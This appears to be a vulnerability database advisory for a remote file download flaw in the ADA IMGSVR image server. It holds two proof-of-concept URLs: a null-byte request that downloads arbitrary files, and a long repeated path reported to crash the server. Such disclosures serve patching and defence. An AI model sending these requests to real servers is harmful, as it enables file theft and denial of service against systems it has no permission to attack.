• info
• discussion
• exploit
• solution
• references

ADA IMGSVR Remote File Download Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

http://www.example.org:1234/someDirectory/fileName%00

The following has been reported to crash the affected server:
http://127.0.0.1:1234/%00/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/